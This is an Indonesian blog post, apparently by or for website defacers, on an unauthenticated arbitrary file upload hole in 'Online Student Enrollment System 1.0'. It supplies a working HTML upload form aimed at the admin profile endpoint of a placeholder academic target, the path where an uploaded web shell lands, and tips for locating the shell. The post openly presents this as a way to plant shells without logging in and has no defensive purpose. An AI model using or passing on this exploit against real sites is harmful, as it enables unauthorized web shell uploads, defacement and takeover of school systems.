Menu

Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload

Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload

                             Student CMS – Kinnaird College For Women

Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload

 
Arbitrary File Upload yang dimana kita bisa mengunggah suatu file dengan swenang atau sembarang .
biasaya para defacer memanfaatkan kerentanan ini dengan mengunggah shell nya , apalagi
yang tidak ter authentication , yang dimana pada kerentanan ini Unauthenticated yaitu kita bisa upload
file tanpa harus melakukan authenticated / login kedalam website ....
 

<!DOCTYPE html>
<html>
<head>
<title>CSRF</title>
</head>
<body>
<form action="https://target.ac.id/admin/index.php?page=user-profile" method="POST" enctype="multipart/form-data">
<input type="file" name="userphoto" required="" id="photo"><br><br>
<input type="submit" name="upphoto" value="upload Photo">
</form>
</body>
</html>

 Path File ? 

/admin/images/You Shell.php 

jika not found coba kalian sampai /images saja siapa tau index of dan lebih mudah mencari shell nya ...

tidak paham ? simak video di bawah ...



Thanksss For Watchingg!!!!! and Look my blog

Iklan Tengah Post

Ads middle content1

Ads middle content2